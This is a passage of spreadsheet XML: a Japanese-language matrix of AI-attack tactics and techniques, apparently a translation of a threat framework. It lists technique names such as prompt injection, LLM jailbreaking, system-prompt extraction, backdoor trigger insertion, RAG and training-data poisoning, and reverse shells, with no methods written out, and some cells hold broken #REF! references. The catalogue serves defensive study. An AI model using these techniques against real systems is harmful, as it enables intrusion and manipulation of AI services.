        <v>771</v>
      </c>
      <c r="E20" s="12" t="s">
        <v>447</v>
      </c>
      <c r="F20" s="13">
        <v>45028</v>
      </c>
      <c r="G20" s="13">
        <v>45762</v>
      </c>
      <c r="H20" s="14"/>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A21" s="10" t="s">
        <v>448</v>
      </c>
      <c r="B21" s="10" t="s">
        <v>449</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>772</v>
      </c>
      <c r="D21" s="11" t="s">
        <v>773</v>
      </c>
      <c r="E21" s="12" t="s">
        <v>450</v>
      </c>
      <c r="F21" s="13">
        <v>45028</v>
      </c>
      <c r="G21" s="13">
        <v>45762</v>
      </c>
      <c r="H21" s="14"/>
    </row>
    <row r="22" spans="1:8" ht="45" x14ac:dyDescent="0.35">
      <c r="A22" s="10" t="s">
        <v>803</v>
      </c>
      <c r="B22" s="10" t="s">
        <v>804</v>
      </c>
      <c r="C22" s="26" t="s">
        <v>817</v>
      </c>
      <c r="D22" s="21" t="s">
        <v>825</v>
      </c>
      <c r="E22" s="12" t="s">
        <v>805</v>
      </c>
      <c r="F22" s="13">
        <v>45959</v>
      </c>
      <c r="G22" s="13">
        <v>45966</v>
      </c>
      <c r="H22" s="14"/>
    </row>
    <row r="23" spans="1:8" ht="75" x14ac:dyDescent="0.35">
      <c r="A23" s="10" t="s">
        <v>806</v>
      </c>
      <c r="B23" s="10" t="s">
        <v>807</v>
      </c>
      <c r="C23" s="26" t="s">
        <v>819</v>
      </c>
      <c r="D23" s="21" t="s">
        <v>824</v>
      </c>
      <c r="E23" s="12" t="s">
        <v>808</v>
      </c>
      <c r="F23" s="13">
        <v>45959</v>
      </c>
      <c r="G23" s="13">
        <v>45966</v>
      </c>
      <c r="H23" s="14"/>
    </row>
    <row r="24" spans="1:8" ht="45" x14ac:dyDescent="0.35">
      <c r="A24" s="10" t="s">
        <v>451</v>
      </c>
      <c r="B24" s="10" t="s">
        <v>452</v>
      </c>
      <c r="C24" s="15" t="s">
        <v>774</v>
      </c>
      <c r="D24" s="21" t="s">
        <v>823</v>
      </c>
      <c r="E24" s="12" t="s">
        <v>453</v>
      </c>
      <c r="F24" s="13">
        <v>45028</v>
      </c>
      <c r="G24" s="13">
        <v>45762</v>
      </c>
      <c r="H24" s="14"/>
    </row>
    <row r="25" spans="1:8" ht="30" x14ac:dyDescent="0.35">
      <c r="A25" s="10" t="s">
        <v>454</v>
      </c>
      <c r="B25" s="10" t="s">
        <v>455</v>
      </c>
      <c r="C25" s="15" t="s">
        <v>775</v>
      </c>
      <c r="D25" s="11" t="s">
        <v>776</v>
      </c>
      <c r="E25" s="12" t="s">
        <v>456</v>
      </c>
      <c r="F25" s="13">
        <v>45028</v>
      </c>
      <c r="G25" s="13">
        <v>45762</v>
      </c>
      <c r="H25" s="14"/>
    </row>
    <row r="26" spans="1:8" ht="45" x14ac:dyDescent="0.35">
      <c r="A26" s="10" t="s">
        <v>457</v>
      </c>
      <c r="B26" s="10" t="s">
        <v>458</v>
      </c>
      <c r="C26" s="15" t="s">
        <v>777</v>
      </c>
      <c r="D26" s="21" t="s">
        <v>794</v>
      </c>
      <c r="E26" s="12" t="s">
        <v>459</v>
      </c>
      <c r="F26" s="13">
        <v>45028</v>
      </c>
      <c r="G26" s="13">
        <v>45211</v>
      </c>
      <c r="H26" s="14"/>
    </row>
    <row r="27" spans="1:8" ht="45" x14ac:dyDescent="0.35">
      <c r="A27" s="10" t="s">
        <v>809</v>
      </c>
      <c r="B27" s="10" t="s">
        <v>810</v>
      </c>
      <c r="C27" s="21" t="s">
        <v>820</v>
      </c>
      <c r="D27" s="21" t="s">
        <v>822</v>
      </c>
      <c r="E27" s="12" t="s">
        <v>811</v>
      </c>
      <c r="F27" s="13">
        <v>45959</v>
      </c>
      <c r="G27" s="13">
        <v>45966</v>
      </c>
      <c r="H27" s="14"/>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A28" s="10" t="s">
        <v>460</v>
      </c>
      <c r="B28" s="10" t="s">
        <v>461</v>
      </c>
      <c r="C28" s="15" t="s">
        <v>778</v>
      </c>
      <c r="D28" s="11" t="s">
        <v>779</v>
      </c>
      <c r="E28" s="16" t="s">
        <v>462</v>
      </c>
      <c r="F28" s="13">
        <v>45028</v>
      </c>
      <c r="G28" s="13">
        <v>45211</v>
      </c>
      <c r="H28" s="14"/>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A29" s="10" t="s">
        <v>463</v>
      </c>
      <c r="B29" s="10" t="s">
        <v>464</v>
      </c>
      <c r="C29" s="15" t="s">
        <v>780</v>
      </c>
      <c r="D29" s="11" t="s">
        <v>781</v>
      </c>
      <c r="E29" s="16" t="s">
        <v>465</v>
      </c>
      <c r="F29" s="13">
        <v>45028</v>
      </c>
      <c r="G29" s="13">
        <v>45211</v>
      </c>
      <c r="H29" s="14"/>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A30" s="10" t="s">
        <v>466</v>
      </c>
      <c r="B30" s="10" t="s">
        <v>467</v>
      </c>
      <c r="C30" s="15" t="s">
        <v>782</v>
      </c>
      <c r="D30" s="11" t="s">
        <v>783</v>
      </c>
      <c r="E30" s="16" t="s">
        <v>468</v>
      </c>
      <c r="F30" s="13">
        <v>45028</v>
      </c>
      <c r="G30" s="13">
        <v>45762</v>
      </c>
      <c r="H30" s="14"/>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A31" s="10" t="s">
        <v>469</v>
      </c>
      <c r="B31" s="10" t="s">
        <v>470</v>
      </c>
      <c r="C31" s="15" t="s">
        <v>784</v>
      </c>
      <c r="D31" s="21" t="s">
        <v>816</v>
      </c>
      <c r="E31" s="12" t="s">
        <v>471</v>
      </c>
      <c r="F31" s="13">
        <v>45028</v>
      </c>
      <c r="G31" s="13">
        <v>45882</v>
      </c>
      <c r="H31" s="14"/>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A32" s="10" t="s">
        <v>472</v>
      </c>
      <c r="B32" s="10" t="s">
        <v>473</v>
      </c>
      <c r="C32" s="15" t="s">
        <v>785</v>
      </c>
      <c r="D32" s="11" t="s">
        <v>786</v>
      </c>
      <c r="E32" s="12" t="s">
        <v>474</v>
      </c>
      <c r="F32" s="13">
        <v>45028</v>
      </c>
      <c r="G32" s="13">
        <v>45762</v>
      </c>
      <c r="H32" s="14"/>
    </row>
    <row r="33" spans="1:8" ht="75" x14ac:dyDescent="0.35">
      <c r="A33" s="10" t="s">
        <v>475</v>
      </c>
      <c r="B33" s="10" t="s">
        <v>476</v>
      </c>
      <c r="C33" s="15" t="s">
        <v>787</v>
      </c>
      <c r="D33" s="11" t="s">
        <v>788</v>
      </c>
      <c r="E33" s="12" t="s">
        <v>477</v>
      </c>
      <c r="F33" s="13">
        <v>45028</v>
      </c>
      <c r="G33" s="13">
        <v>45768</v>
      </c>
      <c r="H33" s="14"/>
    </row>
  </sheetData>
  <phoneticPr fontId="11"/>
  <hyperlinks>
    <hyperlink ref="E3" r:id="rId1" xr:uid="{00000000-0004-0000-0600-000000000000}"/>
    <hyperlink ref="E4" r:id="rId2" xr:uid="{00000000-0004-0000-0600-000001000000}"/>
    <hyperlink ref="E5" r:id="rId3" xr:uid="{00000000-0004-0000-0600-000002000000}"/>
    <hyperlink ref="E6" r:id="rId4" xr:uid="{00000000-0004-0000-0600-000003000000}"/>
    <hyperlink ref="E7" r:id="rId5" xr:uid="{00000000-0004-0000-0600-000004000000}"/>
    <hyperlink ref="E8" r:id="rId6" xr:uid="{00000000-0004-0000-0600-000005000000}"/>
    <hyperlink ref="E9" r:id="rId7" xr:uid="{00000000-0004-0000-0600-000006000000}"/>
    <hyperlink ref="E10" r:id="rId8" xr:uid="{00000000-0004-0000-0600-000007000000}"/>
    <hyperlink ref="E11" r:id="rId9" xr:uid="{00000000-0004-0000-0600-000008000000}"/>
    <hyperlink ref="E12" r:id="rId10" xr:uid="{00000000-0004-0000-0600-000009000000}"/>
    <hyperlink ref="E13" r:id="rId11" xr:uid="{00000000-0004-0000-0600-00000A000000}"/>
    <hyperlink ref="E15" r:id="rId12" xr:uid="{00000000-0004-0000-0600-00000B000000}"/>
    <hyperlink ref="E16" r:id="rId13" xr:uid="{00000000-0004-0000-0600-00000C000000}"/>
    <hyperlink ref="E17" r:id="rId14" xr:uid="{00000000-0004-0000-0600-00000D000000}"/>
    <hyperlink ref="E18" r:id="rId15" xr:uid="{00000000-0004-0000-0600-00000E000000}"/>
    <hyperlink ref="E20" r:id="rId16" xr:uid="{00000000-0004-0000-0600-00000F000000}"/>
    <hyperlink ref="E21" r:id="rId17" xr:uid="{00000000-0004-0000-0600-000010000000}"/>
    <hyperlink ref="E24" r:id="rId18" xr:uid="{00000000-0004-0000-0600-000011000000}"/>
    <hyperlink ref="E25" r:id="rId19" xr:uid="{00000000-0004-0000-0600-000012000000}"/>
    <hyperlink ref="E26" r:id="rId20" xr:uid="{00000000-0004-0000-0600-000013000000}"/>
    <hyperlink ref="E28" r:id="rId21" xr:uid="{00000000-0004-0000-0600-000014000000}"/>
    <hyperlink ref="E29" r:id="rId22" xr:uid="{00000000-0004-0000-0600-000015000000}"/>
    <hyperlink ref="E30" r:id="rId23" xr:uid="{00000000-0004-0000-0600-000016000000}"/>
    <hyperlink ref="E31" r:id="rId24" xr:uid="{00000000-0004-0000-0600-000017000000}"/>
    <hyperlink ref="E32" r:id="rId25" xr:uid="{00000000-0004-0000-0600-000018000000}"/>
    <hyperlink ref="E33" r:id="rId26" xr:uid="{00000000-0004-0000-0600-000019000000}"/>
    <hyperlink ref="E2" r:id="rId27" xr:uid="{30B5846C-BA08-4668-A38E-8FAF90DD3C4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6"/>
  <sheetViews>
    <sheetView topLeftCell="I1" workbookViewId="0">
      <selection activeCell="R2" sqref="R2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="20.7265625" style="2" customWidth="1"/>
    <col min="2" max="2" width="20.7265625" style="3" customWidth="1"/>
    <col min="3" max="3" width="20.7265625" style="2" customWidth="1"/>
    <col min="4" max="4" width="20.7265625" style="3" customWidth="1"/>
    <col min="5" max="5" width="20.7265625" style="2" customWidth="1"/>
    <col min="6" max="6" width="20.7265625" style="3" customWidth="1"/>
    <col min="7" max="7" width="20.7265625" style="4" customWidth="1"/>
    <col min="8" max="8" width="20.7265625" style="2" customWidth="1"/>
    <col min="9" max="9" width="20.7265625" style="3" customWidth="1"/>
    <col min="10" max="10" width="20.7265625" style="2" customWidth="1"/>
    <col min="11" max="11" width="20.7265625" style="3" customWidth="1"/>
    <col min="12" max="12" width="20.7265625" style="4" customWidth="1"/>
    <col min="13" max="13" width="20.7265625" style="2" customWidth="1"/>
    <col min="14" max="14" width="20.7265625" style="3" customWidth="1"/>
    <col min="15" max="15" width="20.7265625" style="4" customWidth="1"/>
    <col min="16" max="16" width="20.7265625" style="2" customWidth="1"/>
    <col min="17" max="17" width="20.7265625" style="3" customWidth="1"/>
    <col min="18" max="18" width="20.7265625" style="6" customWidth="1"/>
    <col min="19" max="19" width="20.7265625" style="4" customWidth="1"/>
    <col min="20" max="20" width="20.7265625" style="2" customWidth="1"/>
    <col min="21" max="21" width="20.7265625" style="3" customWidth="1"/>
    <col min="22" max="22" width="20.7265625" style="4" customWidth="1"/>
    <col min="23" max="23" width="20.7265625" style="2" customWidth="1"/>
    <col min="24" max="24" width="20.7265625" style="3" customWidth="1"/>
    <col min="25" max="25" width="20.7265625" style="2" customWidth="1"/>
    <col min="26" max="26" width="20.7265625" style="3" customWidth="1"/>
    <col min="27" max="27" width="20.7265625" style="4" customWidth="1"/>
    <col min="28" max="16384" width="9" style="4"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:26" s="1" customFormat="1" ht="39" x14ac:dyDescent="0.2">
      <c r="A1" s="30" t="str">
        <f>'tactics (ja)'!C16</f>
        <v>偵察</v>
      </c>
      <c r="B1" s="30"/>
      <c r="C1" s="30" t="str">
        <f>'tactics (ja)'!C17</f>
        <v>リソースの開発</v>
      </c>
      <c r="D1" s="30"/>
      <c r="E1" s="30" t="str">
        <f>'tactics (ja)'!C12</f>
        <v>初期アクセス</v>
      </c>
      <c r="F1" s="30"/>
      <c r="G1" s="5" t="str">
        <f>'tactics (ja)'!C3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="H1" s="30" t="str">
        <f>'tactics (ja)'!C9</f>
        <v>実行</v>
      </c>
      <c r="I1" s="30"/>
      <c r="J1" s="30" t="str">
        <f>'tactics (ja)'!C14</f>
        <v>永続化</v>
      </c>
      <c r="K1" s="30"/>
      <c r="L1" s="5" t="str">
        <f>'tactics (ja)'!C15</f>
        <v>権限昇格</v>
      </c>
      <c r="M1" s="30" t="str">
        <f>'tactics (ja)'!C7</f>
        <v>防御策の回避</v>
      </c>
      <c r="N1" s="30"/>
      <c r="O1" s="5" t="str">
        <f>'tactics (ja)'!C6</f>
        <v>資格情報へのアクセス</v>
      </c>
      <c r="P1" s="30" t="str">
        <f>'tactics (ja)'!C8</f>
        <v>探索</v>
      </c>
      <c r="Q1" s="30"/>
      <c r="R1" s="22" t="s">
        <v>793</v>
      </c>
      <c r="S1" s="5" t="str">
        <f>'tactics (ja)'!C4</f>
        <v>収集</v>
      </c>
      <c r="T1" s="30" t="str">
        <f>'tactics (ja)'!C2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="U1" s="30"/>
      <c r="V1" s="5" t="str">
        <f>'tactics (ja)'!C5</f>
        <v>コマンド＆コントロール</v>
      </c>
      <c r="W1" s="30" t="str">
        <f>'tactics (ja)'!C10</f>
        <v>持出し</v>
      </c>
      <c r="X1" s="30"/>
      <c r="Y1" s="30" t="str">
        <f>'tactics (ja)'!C11</f>
        <v>影響</v>
      </c>
      <c r="Z1" s="30"/>
    </row>
    <row r="2" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="str">
        <f>'techniques (ja)'!C15</f>
        <v>能動的なスキャン</v>
      </c>
      <c r="C2" s="31" t="str">
        <f>'techniques (ja)'!C12</f>
        <v>インフラストラクチャの獲得</v>
      </c>
      <c r="D2" s="3" t="str">
        <f>'techniques (ja)'!C6</f>
        <v>AI 開発のワークスペース</v>
      </c>
      <c r="E2" s="31" t="str">
        <f>'techniques (ja)'!C10</f>
        <v>AI サプライ チェーンの侵害</v>
      </c>
      <c r="F2" s="3" t="str">
        <f>'techniques (ja)'!C9</f>
        <v>AI ソフトウェア</v>
      </c>
      <c r="G2" s="4" t="str">
        <f>'techniques (ja)'!C8</f>
        <v>AI モデルの推論 API へのアクセス</v>
      </c>
      <c r="H2" s="2" t="str">
        <f>'techniques (ja)'!C23</f>
        <v>コマンドおよびスクリプト インタープリター</v>
      </c>
      <c r="J2" s="2" t="str">
        <f>'techniques (ja)'!C81</f>
        <v>LLM プロンプトの自己複製</v>
      </c>
      <c r="L2" s="4" t="str">
        <f>'techniques (ja)'!C77</f>
        <v>LLM の脱獄</v>
      </c>
      <c r="M2" s="2" t="str">
        <f>'techniques (ja)'!C26</f>
        <v>AI モデルの破損</v>
      </c>
      <c r="O2" s="6" t="str">
        <f>'techniques (ja)'!C134</f>
        <v>セキュリティ上問題のある資格情報</v>
      </c>
      <c r="P2" s="2" t="str">
        <f>'techniques (ja)'!C22</f>
        <v>クラウド サービスの探索</v>
      </c>
      <c r="S2" s="4" t="str">
        <f>'techniques (ja)'!C5</f>
        <v>AI アーティファクトの収集</v>
      </c>
      <c r="T2" s="32" t="str">
        <f>'techniques (ja)'!C28</f>
        <v>敵対的データの作成</v>
      </c>
      <c r="U2" s="3" t="str">
        <f>'techniques (ja)'!C19</f>
        <v>ブラック ボックス最適化</v>
      </c>
      <c r="V2" s="4" t="str">
        <f>'techniques (ja)'!C112</f>
        <v>リバース シェル</v>
      </c>
      <c r="W2" s="32" t="str">
        <f>'techniques (ja)'!C56</f>
        <v>AI の推論 API による流出</v>
      </c>
      <c r="X2" s="3" t="str">
        <f>'techniques (ja)'!C60</f>
        <v>AI モデルの抽出</v>
      </c>
      <c r="Y2" s="2" t="str">
        <f>'techniques (ja)'!C27</f>
        <v>コスト ハーベスティング</v>
      </c>
    </row>
    <row r="3" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="str">
        <f>'techniques (ja)'!C65</f>
        <v>RAG インデックス化された対象の収集</v>
      </c>
      <c r="C3" s="31"/>
      <c r="D3" s="3" t="str">
        <f>'techniques (ja)'!C24</f>
        <v>消費者向けハードウェア</v>
      </c>
      <c r="E3" s="31"/>
      <c r="F3" s="3" t="str">
        <f>'techniques (ja)'!C31</f>
        <v>データ</v>
      </c>
      <c r="G3" s="4" t="str">
        <f>'techniques (ja)'!C11</f>
        <v>AI 対応の製品やサービス</v>
      </c>
      <c r="H3" s="2" t="e">
        <f>'techniques (ja)'!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J3" s="31" t="str">
        <f>'techniques (ja)'!C85</f>
        <v>AI モデルの操作</v>
      </c>
      <c r="K3" s="3" t="str">
        <f>'techniques (ja)'!C93</f>
        <v>AI モデルのアーキテクチャの改変</v>
      </c>
      <c r="L3" s="4" t="e">
        <f>'techniques (ja)'!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M3" s="2" t="str">
        <f>'techniques (ja)'!C54</f>
        <v>AI モデルの回避</v>
      </c>
      <c r="P3" s="2" t="str">
        <f>'techniques (ja)'!C41</f>
        <v>AI アーティファクトの探索</v>
      </c>
      <c r="S3" s="4" t="str">
        <f>'techniques (ja)'!C33</f>
        <v>情報リポジトリのデータ</v>
      </c>
      <c r="T3" s="32"/>
      <c r="U3" s="3" t="str">
        <f>'techniques (ja)'!C20</f>
        <v>ブラック ボックス転送</v>
      </c>
      <c r="W3" s="32"/>
      <c r="X3" s="3" t="str">
        <f>'techniques (ja)'!C72</f>
        <v>学習データのメンバーシップ推論</v>
      </c>
      <c r="Y3" s="2" t="str">
        <f>'techniques (ja)'!C37</f>
        <v>AI サービスへの運用妨害</v>
      </c>
    </row>
    <row r="4" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A4" s="2" t="str">
        <f>'techniques (ja)'!C113</f>
        <v>アプリケーション リポジトリの検索</v>
      </c>
      <c r="C4" s="31" t="str">
        <f>'techniques (ja)'!C13</f>
        <v>公開されている AI アーティファクトの獲得</v>
      </c>
      <c r="D4" s="3" t="str">
        <f>'techniques (ja)'!C35</f>
        <v>データセット</v>
      </c>
      <c r="E4" s="31"/>
      <c r="F4" s="3" t="str">
        <f>'techniques (ja)'!C69</f>
        <v>ハードウェア</v>
      </c>
      <c r="G4" s="4" t="str">
        <f>'techniques (ja)'!C64</f>
        <v>AI モデルへの完全なアクセス</v>
      </c>
      <c r="H4" s="32" t="str">
        <f>'techniques (ja)'!C79</f>
        <v>LLM プロンプト インジェクション</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'techniques (ja)'!C39</f>
        <v>直接（インジェクション）</v>
      </c>
      <c r="J4" s="31"/>
      <c r="K4" s="3" t="str">
        <f>'techniques (ja)'!C99</f>
        <v>AI モデルの汚染</v>
      </c>
      <c r="M4" s="32" t="str">
        <f>'techniques (ja)'!C62</f>
        <v>偽 RAG エントリ インジェクション</v>
      </c>
      <c r="N4" s="3" t="str">
        <f>'techniques (ja)'!C21</f>
        <v>引用</v>
      </c>
      <c r="P4" s="2" t="str">
        <f>'techniques (ja)'!C42</f>
        <v>AI モデル ファミリーの探索</v>
      </c>
      <c r="S4" s="4" t="str">
        <f>'techniques (ja)'!C34</f>
        <v>ローカル システムのデータ</v>
      </c>
      <c r="T4" s="32"/>
      <c r="U4" s="3" t="str">
        <f>'techniques (ja)'!C73</f>
        <v>バックドア トリガーの挿入</v>
      </c>
      <c r="W4" s="32"/>
      <c r="X4" s="3" t="str">
        <f>'techniques (ja)'!C74</f>
        <v>AI モデルの反転</v>
      </c>
      <c r="Y4" s="2" t="str">
        <f>'techniques (ja)'!C51</f>
        <v>AI モデルの整合性の侵害</v>
      </c>
    </row>
    <row r="5" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A5" s="2" t="str">
        <f>'techniques (ja)'!C114</f>
        <v>AI の脆弱性に関する公開されている分析結果の検索</v>
      </c>
      <c r="C5" s="31"/>
      <c r="D5" s="3" t="str">
        <f>'techniques (ja)'!C91</f>
        <v>モデル（注: 原文では Models）</v>
      </c>
      <c r="E5" s="31"/>
      <c r="F5" s="3" t="str">
        <f>'techniques (ja)'!C90</f>
        <v>モデル（注: 原文では Model）</v>
      </c>
      <c r="G5" s="4" t="str">
        <f>'techniques (ja)'!C98</f>
        <v>物理環境へのアクセス</v>
      </c>
      <c r="H5" s="32"/>
      <c r="I5" s="3" t="str">
        <f>'techniques (ja)'!C71</f>
        <v>間接（インジェクション）</v>
      </c>
      <c r="J5" s="2" t="str">
        <f>'techniques (ja)'!C100</f>
        <v>学習データの汚染</v>
      </c>
      <c r="M5" s="32"/>
      <c r="N5" s="3" t="str">
        <f>'techniques (ja)'!C25</f>
        <v>コンテナ レジストリ</v>
      </c>
      <c r="P5" s="2" t="str">
        <f>'techniques (ja)'!C43</f>
        <v>AI モデルのオントロジーの探索</v>
      </c>
      <c r="T5" s="32"/>
      <c r="U5" s="3" t="str">
        <f>'techniques (ja)'!C87</f>
        <v>手動による変更</v>
      </c>
      <c r="W5" s="2" t="str">
        <f>'techniques (ja)'!C57</f>
        <v>サイバー手段による流出</v>
      </c>
      <c r="Y5" s="2" t="str">
        <f>'techniques (ja)'!C52</f>
        <v>データセットの整合性の侵害</v>
      </c>
      <c r="Z5" s="3" t="str">
        <f>'techniques (ja)'!C84</f>
        <v>悪意のあるパッケージ</v>
      </c>
    </row>
    <row r="6" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A6" s="31" t="str">
        <f>'techniques (ja)'!C115</f>
        <v>公開されている技術データベースの検索</v>
      </c>
      <c r="B6" s="3" t="str">
        <f>'techniques (ja)'!C75</f>
        <v>定期刊行物やカンファレンス議事録</v>
      </c>
      <c r="C6" s="2" t="str">
        <f>'techniques (ja)'!C38</f>
        <v>機能の開発</v>
      </c>
      <c r="D6" s="3" t="str">
        <f>'techniques (ja)'!C17</f>
        <v>AI への敵対的攻撃</v>
      </c>
      <c r="E6" s="2" t="str">
        <f>'techniques (ja)'!C48</f>
        <v>ドライブ バイによる侵害</v>
      </c>
      <c r="H6" s="2" t="str">
        <f>'techniques (ja)'!C137</f>
        <v>ユーザーによる実行</v>
      </c>
      <c r="I6" s="3" t="str">
        <f>'techniques (ja)'!C133</f>
        <v>安全でない AI アーティファクト</v>
      </c>
      <c r="J6" s="2" t="str">
        <f>'techniques (ja)'!C109</f>
        <v>RAG の汚染</v>
      </c>
      <c r="M6" s="32"/>
      <c r="N6" s="3" t="str">
        <f>'techniques (ja)'!C49</f>
        <v>マルウェアの埋め込み</v>
      </c>
      <c r="P6" s="2" t="str">
        <f>'techniques (ja)'!C44</f>
        <v>AI モデルの出力の探索</v>
      </c>
      <c r="Q6" s="3" t="str">
        <f>'techniques (ja)'!C68</f>
        <v>生成 AI</v>
      </c>
      <c r="T6" s="32"/>
      <c r="U6" s="3" t="str">
        <f>'techniques (ja)'!C141</f>
        <v>ホワイト ボックス最適化</v>
      </c>
      <c r="W6" s="2" t="str">
        <f>'techniques (ja)'!C61</f>
        <v>LLM システム プロンプトの抽出</v>
      </c>
      <c r="Y6" s="2" t="str">
        <f>'techniques (ja)'!C54</f>
        <v>AI モデルの回避</v>
      </c>
    </row>
    <row r="7" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A7" s="31"/>
      <c r="B7" s="3" t="str">
        <f>'techniques (ja)'!C101</f>
        <v>プレプリント リポジトリ</v>
      </c>
      <c r="C7" s="2" t="str">
        <f>'techniques (ja)'!C53</f>
        <v>アカウントの確立</v>
      </c>
      <c r="E7" s="2" t="str">
        <f>'techniques (ja)'!C54</f>
        <v>AI モデルの回避</v>
      </c>
      <c r="M7" s="2" t="str">
        <f>'techniques (ja)'!C70</f>
        <v>なりすまし</v>
      </c>
      <c r="P7" s="32" t="str">
        <f>'techniques (ja)'!C45</f>
        <v>LLM の幻覚の探索</v>
      </c>
      <c r="Q7" s="3" t="str">
        <f>'techniques (ja)'!C47</f>
        <v>ドメイン</v>
      </c>
      <c r="T7" s="32" t="str">
        <f>'techniques (ja)'!C29</f>
        <v>プロキシー AI モデルの作成</v>
      </c>
      <c r="U7" s="3" t="str">
        <f>'techniques (ja)'!C130</f>
        <v>収集した AI アーティファクトによるプロキシーの学習</v>
      </c>
      <c r="W7" s="2" t="str">
        <f>'techniques (ja)'!C76</f>
        <v>LLM からのデータ漏洩</v>
      </c>
      <c r="Y7" s="31" t="str">
        <f>'techniques (ja)'!C59</f>
        <v>外部への危害</v>
      </c>
      <c r="Z7" s="3" t="str">
        <f>'techniques (ja)'!C7</f>
        <v>AI 知的財産の窃取</v>
      </c>
    </row>
    <row r="8" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A8" s="31"/>
      <c r="B8" s="3" t="str">
        <f>'techniques (ja)'!C127</f>
        <v>技術ブログ</v>
      </c>
      <c r="C8" s="2" t="str">
        <f>'techniques (ja)'!C78</f>
        <v>LLM プロンプトの作成</v>
      </c>
      <c r="E8" s="2" t="str">
        <f>'techniques (ja)'!C58</f>
        <v>公開アプリケーションの悪用</v>
      </c>
      <c r="M8" s="2" t="str">
        <f>'techniques (ja)'!C77</f>
        <v>LLM の脱獄</v>
      </c>
      <c r="P8" s="32"/>
      <c r="Q8" s="3" t="str">
        <f>'techniques (ja)'!C97</f>
        <v>物理的な対抗手段</v>
      </c>
      <c r="T8" s="32"/>
      <c r="U8" s="3" t="str">
        <f>'techniques (ja)'!C131</f>
        <v>レプリケーションによるプロキシーの学習</v>
      </c>
      <c r="W8" s="2" t="str">
        <f>'techniques (ja)'!C82</f>
        <v>LLM 応答のレンダリング</v>
      </c>
      <c r="X8" s="3" t="str">
        <f>'techniques (ja)'!C118</f>
        <v>サーバーレス</v>
      </c>
      <c r="Y8" s="31"/>
      <c r="Z8" s="3" t="str">
        <f>'techniques (ja)'!C63</f>
        <v>財務的損害</v>
      </c>
    </row>
    <row r="9" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="A9" s="2" t="str">
        <f>'techniques (ja)'!C117</f>
        <v>被害者が所有するウェブサイトの検索</v>
      </c>
      <c r="C9" s="31" t="str">
        <f>'techniques (ja)'!C95</f>
        <v>機能の獲得</v>
      </c>
      <c r="D9" s="3" t="str">
        <f>'techniques (ja)'!C16</f>
        <v>AI への敵対的攻撃の実装</v>
      </c>
      <c r="E9" s="2" t="str">
        <f>'techniques (ja)'!C96</f>
        <v>フィッシング</v>
      </c>
      <c r="F9" s="3" t="str">
        <f>'techniques (ja)'!C122</f>
        <v>LLM ソーシャル エンジニアリングによるスピア フィッシング</v>
      </c>
      <c r="M9" s="2" t="str">
        <f>'techniques (ja)'!C80</f>
        <v>LLM プロンプトの難読化</v>
      </c>
      <c r="P9" s="32" t="str">
        <f>'techniques (ja)'!C46</f>
        <v>LLM のシステム情報の探索</v>
      </c>
      <c r="Q9" s="3" t="str">
        <f>'techniques (ja)'!C123</f>
        <v>特殊文字セット</v>
      </c>
      <c r="T9" s="32"/>
      <c r="U9" s="3" t="str">
        <f>'techniques (ja)'!C136</f>
        <v>学習済みモデルの使用</v>
      </c>
      <c r="Y9" s="31"/>
      <c r="Z9" s="3" t="str">
        <f>'techniques (ja)'!C110</f>
        <v>風評被害</v>
      </c>
    </row>
    <row r="10" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="C10" s="31"/>
      <c r="D10" s="3" t="str">
        <f>'techniques (ja)'!C120</f>
        <v>ソフトウェア ツール</v>
      </c>
      <c r="E10" s="2" t="str">
        <f>'techniques (ja)'!C139</f>
        <v>有効なアカウント</v>
      </c>
      <c r="M10" s="2" t="str">
        <f>'techniques (ja)'!C83</f>
        <v>LLM からの信頼された出力コンポーネントの操作</v>
      </c>
      <c r="P10" s="32"/>
      <c r="Q10" s="3" t="str">
        <f>'techniques (ja)'!C125</f>
        <v>システム命令に関するキーワード</v>
      </c>
      <c r="T10" s="32" t="str">
        <f>'techniques (ja)'!C85</f>
        <v>AI モデルの操作</v>
      </c>
      <c r="U10" s="3" t="str">
        <f>'techniques (ja)'!C93</f>
        <v>AI モデルのアーキテクチャの改変</v>
      </c>
      <c r="Y10" s="31"/>
      <c r="Z10" s="3" t="str">
        <f>'techniques (ja)'!C119</f>
        <v>社会的損害</v>
      </c>
    </row>
    <row r="11" spans="1:26" x14ac:dyDescent="0.2">
      <c r="C11" s="2" t="str">
        <f>'techniques (ja)'!C100</f>
        <v>学習データの汚染</v>
      </c>
      <c r="M11" s="2" t="str">
        <f>'techniques (ja)'!C88</f>
        <v>マスカレード</v>
      </c>
      <c r="P11" s="32"/>
      <c r="Q11" s="3" t="str">
        <f>'techniques (ja)'!C126</f>
        <v>システム プロンプト</v>
      </c>
      <c r="T11" s="32"/>
      <c r="U11" s="3" t="str">
        <f>'techniques (ja)'!C99</f>
        <v>AI モデルの汚染</v>
      </c>
      <c r="Y11" s="31"/>
      <c r="Z11" s="3" t="str">
        <f>'techniques (ja)'!C138</f>
        <v>ユーザー被害</v>
      </c>
    </row>
    <row r="12" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="C12" s="2" t="str">
        <f>'techniques (ja)'!C104</f>
